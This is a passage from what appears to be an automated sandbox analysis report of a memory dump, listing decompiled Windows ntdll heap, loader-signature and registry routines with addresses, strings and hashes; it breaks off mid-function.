0x0100b7ed
0x0100b7ef
0x0100b7f2
0x0100b7f2
0x0100b7f5
0x0100b7fa
0x01052c2d
0x01052c2e
0x01052c39
0x0100b800
0x0100b800
0x0100b802
0x0100b805
0x0100b808
0x0100b808
0x0100b80a
0x0100b80d
0x0100b816
0x0100b81c
0x0100b822
0x0100b82f
0x0100b88b
0x0100b892
0x0100b897
0x0100b899
0x0100b89b
0x0100b89e
0x0100b8a5
0x0100b8a8
0x0100b8aa
0x0100b8ac
0x0100b8ac
0x0100b8aa
0x0100b892
0x0100b831
0x0100b839
0x0100b83b
0x0100b83b
0x0100b844
0x0100b84b
0x0100b852
0x0100b7b8
0x0100b7ba
0x0100b7bf
0x0100b7c4
0x01052c18
0x01052c19
0x01052c23
0x0100b7ca
0x0100b7ca
0x0100b7cc
0x0100b7cf
0x0100b7d1
0x0100b7d1
0x0100b7d4
0x0100b7dc
0x0100b8bb
0x0100b8bb
0x0100b8be
0x0100b8be
0x0100b8c1
0x00000000
0x00000000
0x0100b8c3
0x0100b8c5
0x0100b8c7
0x0100b8e0
0x00000000
0x0100b8e0
0x0100b8cc
0x0100b8cc
0x00000000
0x0100b8cc
0x0100b8d6
0x0100b8d6
0x00000000
0x0100b7dc
0x0100b7b6

Strings

HEAP[%wZ]: , xrefs: 01052BDB
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01052BF3
HEAP: , xrefs: 01052BE8

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 038865fda4c0138ef50f380262a8c4470fe794bf0a27494ddaff3f52cdeb8416
Instruction ID: 8f4abdd935afdfeadf06088466632550cd1f4fae81bb3c1e7e6730d27b7737db
Opcode Fuzzy Hash: 038865fda4c0138ef50f380262a8c4470fe794bf0a27494ddaff3f52cdeb8416
Instruction Fuzzy Hash: 0261FA74600241DFEB5ACF28C445B6ABBE5FF04714F14859EE8898F392D734E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x10d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x10d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01007D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01007D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FEB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00ff7e4c
0x00ff7e50
0x00ff7e55
0x00ff7e58
0x00ff7e5d
0x00ff7e71
0x00ff7f33
0x00ff7e77
0x00ff7e77
0x00ff7e79
0x00ff7e79
0x00ff7e7e
0x00ff7f45
0x01049848
0x00000000
0x01049848
0x00ff7f4e
0x00ff7f53
0x00ff7f5a
0x00000000
0x00000000
0x0104985a
0x01049862
0x01049866
0x00000000
0x0104986c
0x00000000
0x0104986c
0x00ff7e84
0x00ff7e84
0x00ff7e8d
0x01049871
0x00ff7eb8
0x00ff7ec0
0x00ff7ec0
0x00ff7e9a
0x0104987e
0x00000000
0x00000000
0x01049884
0x0104988b
0x010498a7
0x010498ac
0x010498b1
0x010498b6
0x010498b8
0x010498b8
0x010498b9
0x00000000
0x010498b9
0x00ff7ea0
0x00ff7ea7
0x00000000
0x00000000
0x00ff7eac
0x00ff7eb1
0x00ff7ec6
0x00ff7ed0
0x010498cc
0x00ff7ed6
0x00ff7ed6
0x00ff7ed6
0x00ff7ede
0x00ff7ee3
0x010498e3
0x010498f0
0x01049902
0x010498f2
0x010498fb
0x010498fb
0x01049907
0x0104991d
0x0104991d
0x01049907
0x010498e3
0x00ff7ef0
0x00ff7f14
0x00ff7f14
0x00ff7f1e
0x01049946
0x00ff7f24
0x00ff7f24
0x00ff7f24
0x00ff7f2c
0x0104996a
0x01049975
0x01049975
0x0104997e
0x01049993
0x01049993
0x0104997e
0x00000000
0x00ff7ef2
0x00ff7efc
0x00ff7f0a
0x00ff7f0e
0x01049933
0x00000000
0x01049933
0x00000000
0x00ff7f0e
0x00000000
0x00000000
0x00000000
0x00ff7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
LdrpCompleteMapModule, xrefs: 01049898
minkernel\ntdll\ldrmap.c, xrefs: 010498A2

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790

Uniqueness

Uniqueness Score: -1.00%

Function 010923E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E010923E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x10d874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x10d874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0103D4F0(_t83, 0xfc6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00FEB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x10d6378 = 1;
						asm("int3");
						 *0x10d6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x010923e3
0x010923e8
0x010923eb
0x010923ee
0x010923f3
0x0109259b
0x0109259b
0x0109259d
0x010925a3
0x010925a3
0x010923fb
0x01092424
0x0109244f
0x01092460
0x01092451
0x01092451
0x01092456
0x01092458
0x01092458
0x0109245b
0x0109245b
0x01092426
0x01092431
0x01092436
0x01092443
0x01092438
0x01092438
0x01092438
0x01092445
0x01092445
0x01092463
0x01092469
0x0109246f
0x01092480
0x01092495
0x010924a1
0x010924ce
0x010924df
0x010924d0
0x010924d0
0x010924d5
0x010924d7
0x010924d7
0x010924da
0x010924da
0x010924a3
0x010924b0
0x010924b5
0x010924c2
0x010924b7
0x010924b7
0x010924b7
0x010924c4
0x010924c4
0x010924e8
0x01092497
0x0109249a
0x0109249a
0x01092482
0x01092488
0x01092488
0x01092471
0x01092479
0x01092479
0x010924ef
0x010923fd
0x01092401
0x01092412
0x01092403
0x01092403
0x01092408
0x0109240a
0x0109240a
0x0109240d
0x0109240d
0x0109241b
0x0109241b
0x010924f1
0x010924f6
0x01092507
0x01092510
0x00000000
0x01092510
0x0109250b
0x00000000
0x010924f8
0x010924f8
0x010924fc
0x01092500
0x01092512
0x01092515
0x0109251a
0x01092521
0x01092524
0x01092529
0x0109252f
0x00000000
0x00000000
0x0109253c
0x0109255c
0x01092561
0x0109253e
0x01092554
0x01092559
0x0109256a
0x0109256d
0x01092574
0x01092586
0x01092588
0x0109258f
0x01092590
0x01092590
0x01092597
0x00000000
0x01092597

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 0109256F
HEAP[%wZ]: , xrefs: 0109254F
HEAP: , xrefs: 0109255C

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 2889bd9add0d43c397cf3c93addefa3e0d790b3082440aa5d78adb66c6b75d85
Instruction ID: 5483b65cb6aaeb173c3be30a4f6e749dbcc62c8348e23dcd823db10ad8887edb
Opcode Fuzzy Hash: 2889bd9add0d43c397cf3c93addefa3e0d790b3082440aa5d78adb66c6b75d85
Instruction Fuzzy Hash: A2514834104250AAEBB4DE1EC8747767BF1EB44744F55889DE8C28B286DB3AD847FB21

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FEE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FEF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010295D0();
						}
						if(_t78 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0102FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01029600();
					if(_t97 < 0) {
						goto L6;
					}
					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0102BB40(_t83, _t102 + 0x24, _t78);
								if(L00FF43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0102BB40(_t84, _t102 + 0x24, _t94);
									if(L00FF43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00fee620
0x00fee628
0x00fee62f
0x00fee631
0x00fee635
0x00fee637
0x00fee63e
0x01045503
0x01045503
0x00fee64c
0x00fee64c
0x00fee651
0x00000000
0x00000000
0x00fee661
0x00fee665
0x0104542a
0x00fee715
0x00fee71a
0x00fee71c
0x00fee720
0x00fee720
0x00fee727
0x00fee736
0x00fee736
0x00fee743
0x00fee743
0x00fee673
0x00fee678
0x00fee67d
0x00fee682
0x00fee685
0x00fee692
0x00fee69b
0x00fee6a3
0x00fee6ad
0x00fee6b1
0x00fee6b2
0x00fee6bb
0x00fee6bf
0x00fee6c0
0x00fee6c8
0x00fee6cc
0x00fee6d5
0x00fee6d9
0x00000000
0x00000000
0x00fee6e5
0x00fee6ea
0x00fee6f9
0x00fee70b
0x00fee70f
0x01045439
0x0104545e
0x0104545e
0x00000000
0x0104545e
0x0104543b
0x0104543e
0x01045440
0x01045445
0x01045472
0x01045475
0x0104548d
0x01045493
0x010454a9
0x00000000
0x00000000
0x010454ab
0x010454b4
0x010454bc
0x010454c8
0x010454de
0x010454fb
0x010454e0
0x010454e6
0x010454eb
0x010454eb
0x010454de
0x00000000
0x010454bc
0x01045477
0x0104547a
0x01045480
0x01045483
0x01045486
0x0104548b
0x00000000
0x00000000
0x00000000
0x0104548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01045447
0x01045447
0x01045447
0x01045447
0x0104544e
0x00000000
0x00000000
0x01045450
0x01045452
0x01045455
0x0104545a
0x00000000
0x00000000
0x00000000
0x0104545c
0x0104546a
0x0104546d
0x0104546f
0x00000000
0x0104546f
0x00fee70f

Strings

InstallLanguageFallback, xrefs: 00FEE6DB
@, xrefs: 00FEE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0100B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0100B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x10d8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00FEB150();
						} else {
							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00FEB150();
						__eflags =  *0x10d7bc8;
						if(__eflags == 0) {
							E010A2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0100AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x0100b8f0
0x0100b8f2
0x0100b8f4
0x01052c4e
0x01052c50
0x01052c56
0x01052c5c
0x01052c60
0x01052c7f
0x01052c84
0x01052c62
0x01052c77
0x01052c7c
0x01052c8a
0x01052c8f
0x01052c94
0x01052c9c
0x01052ca5
0x01052ca5
0x01052c9c
0x01052c50
0x0100b8fa
0x0100b902
0x0100b921
0x0100b921
0x0100b924
0x0100b924
0x0100b927
0x00000000
0x00000000
0x0100b929
0x0100b92b
0x0100b92d
0x0100b940
0x00000000
0x0100b940
0x0100b932
0x0100b932
0x00000000
0x0100b932
0x00000000
0x0100b904
0x0100b904
0x0100b90a
0x0100b90c
0x0100b916
0x0100b919
0x0100b915
0x0100b915
0x0100b91b
0x0100b91b
0x00000000
0x0100b910

Strings

HEAP[%wZ]: , xrefs: 01052C72
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01052C8A
HEAP: , xrefs: 01052C7F

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: d9e05eb6568dcf4240960d00dda5f837bf43c0b84fec58ab65908c0da72b3b9e
Instruction ID: 9f91a373de411f6459b102a984dadcb3c47a46c513647ab9def4134bcd13d4e9
Opcode Fuzzy Hash: d9e05eb6568dcf4240960d00dda5f837bf43c0b84fec58ab65908c0da72b3b9e
Instruction Fuzzy Hash: 5211EE353095029FE76A9B19C491F7AB7A1EF40720F18806DE48ACB292D738D940D742

Uniqueness

Uniqueness Score: -1.00%

Function 010AE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E010AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E010ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E010ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E010AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01029730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E010AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E010AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E010AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E010AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01002280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00FFB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00FFFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01007D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0109FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
